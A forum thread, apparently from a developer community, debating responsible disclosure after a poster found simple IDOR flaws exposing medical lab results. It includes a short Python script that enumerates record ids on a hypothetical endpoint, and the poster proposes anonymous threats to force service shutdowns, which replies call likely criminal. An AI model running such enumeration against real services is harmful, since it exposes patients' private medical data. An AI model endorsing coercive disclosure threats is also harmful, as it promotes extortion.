I'm a bit conflicted about what responsible disclosure should be, but in many cases it seems like these conditions hold:

1) the hack is straightforward to do;

2) it can do a lot of damage (get PII or other confidential info in most cases);

3) downtime of the service wouldn't hurt anyone, especially when weighed against the damage a breach could do.

But instead of insisting that the affected service be shut down immediately, we give companies weeks or months to fix the issue while they notify no one and carry on with business as usual.

I've submitted 3 very easy exploits to 3 different companies in the past year and, thankfully, they fixed them within about a week every time. Still, the exploits were trivial (I admit I'm not good enough to find the hard ones). Mostly IDORs, like changing id=123456 to id=1 and so on up through id=123455, and seeing a lot of medical data that doesn't belong to me. All 3 cases were medical labs, because I had to have some tests done and wanted to see how secure my data was.
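To make the class of bug concrete, here's a minimal sketch of that kind of IDOR probe. Everything in it is hypothetical - the endpoint, the parameter name, and the response check are assumptions for illustration, not any actual lab's API:

    # Hypothetical IDOR probe: iterate ids below my own and see whether
    # the server returns other people's records to my ordinary session.
    import requests

    BASE = "https://lab.example.com/results?id={}"  # hypothetical endpoint
    MY_ID = 123456                                  # the only record I'm authorized to see

    session = requests.Session()
    # A legitimate, logged-in session of my own - no privilege escalation involved.
    session.cookies.set("session", "MY_OWN_SESSION_TOKEN")

    for record_id in range(1, MY_ID):
        resp = session.get(BASE.format(record_id))
        # HTTP 200 with a result body for an id that isn't mine means the
        # server never checked ownership - which is the definition of an IDOR.
        if resp.ok and "test results" in resp.text.lower():
            print(f"id={record_id} is readable without authorization")

The corresponding fix is just as simple: before serving a record, the server must verify that the authenticated user owns (or is otherwise entitled to) that id. Sequential ids aren't the bug; the missing ownership check is.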

Sadly, in all 3 cases I had to send a follow-up e-mail after ~1 week, saying that I'd make the exploit public if they didn't fix it ASAP. And in all 3 cases, the exploit was then fixed within 1-2 days.

If I'd given them a month, I feel they would've fixed the issue after a month. If I'd given them a year - after a year.

And it's not like there aren't 10 different labs in my city. It's not like online access to results is critical, either: you can pick up a printed result, or call the lab and write the results down yourself. Yes, it would be tedious, but more secure.

So I should've said something like this from the beginning:

> I found this trivial exploit that gives me access to medical data of thousands of people. If you don't want it public, shut down your online service until you fix it, because it's highly likely someone else figured it out before me. If you don't, I'll make it public and ruin your reputation.

Now, would I actually make it public if they didn't fix it within a few days? Probably not, but I'm not sure. But shutting down their service until the fix is in seems important. If it were some hard-to-pull-off hack chaining several exploits, including a 0-day, it would be likely that I was the first to find it and that no one else would stumble on it for a while. But ID enumeration? Come on.

So does the standard "responsible disclosure", at least in the scenario I've given (easy to do; not critical if the service is shut down), help the affected parties (the customers) or the businesses? Why should I care about a company worth $X losing $Y if it's their fault?

I think in the future I'll contact companies anonymously, with much stricter deadlines, if their customers (or others) are at serious risk. I'll lose the ability to brag under my real name, but I can live with that.

As for the other comments about how spammed their security@ inbox is - that's the cost of doing business. It doesn't seem like a valid excuse to me. Security isn't one of hundreds of random things a business should care about; it's one of the most important ones. So assign more people to review the mail. If you can't, why are you handling people's PII?





Don't do this.

I understand you think you're doing the right thing, but be aware that by shutting down a medical communication service there's a non-trivial chance someone will die because of slower test results.

Your responsibility is responsible disclosure.

Their responsibility is how to handle it. Don't try to decide that for them.


> I think in the future I'll contact companies anonymously, with much stricter deadlines, if their customers (or others) are at serious risk. I'll lose the ability to brag under my real name, but I can live with that.

What you're describing is likely a crime. The sad reality is most businesses don't view protection of customers' data as a sacred duty, but simply another of the innumerable risks to be managed in the course of doing business. If they can say "we were working on fixing it!" their asses are likely covered even if someone does leverage the exploit first—and worst-case, they'll just pay a fine and move on.


Precisely - they view security as just one of many parts of their business, instead of one of the most important parts. They've insured themselves against a breach, so it's not a big deal to them. But it should be.

The more casualties, the more media attention -> the more likely it is that they, and others in their field, will take security seriously in the future.

If we let them do nothing for a month, they'll eventually fix it, but in the meantime malicious hackers may gain access to the PII. They might not make it public, instead selling it on black markets. The company may not get the negative publicity it deserves, and likely won't learn to fix its systems in time or adopt adequate security measures. The sale of the PII and the breach itself might only become public knowledge months after the fact, while the company has had a chance to grow in the meantime and make more security mistakes that may be exploited later on.

And yes, I know it may be a crime - that's why I said I'd report it anonymously from now on. But if the company sits on their asses for a month, shouldn't that count as a crime, as well? The current definition of responsible disclosure gives companies too much leeway, in my opinion.

If I knew I operated a service that was trivial to exploit and hosted people's PII, I'd shut it down until I fixed it. People won't die if I do everything in my power to provide the test results (in my example of medical labs) to doctors and patients via other means, such as paper or phone. And if people did die, it would be devastating, of course, but it would mean society had put too much trust into a single system without making sure it wasn't vulnerable to the most basic of attacks. So it would have happened sooner or later anyway. Although I can't imagine someone dying because their doctor had to call the lab instead of typing in a URL.

The same argument about people dying due to the disruption of a medical communications system could be made about too-big-to-fail companies that are entrenched in society because a lot of pension funds have invested in them. If such a company goes under, the innocent people dependent on the pension fund's finances would suffer. That would be awful, of course, but is the alternative to never let such companies go bankrupt? Or would it be better for such funds not to rely so heavily on one specific company in the first place? That is to say, in both cases (security or stocks in general) the reality is that people are currently too dependent on a few singular entities, and they shouldn't be. That has to change, and the change has to begin somewhere.



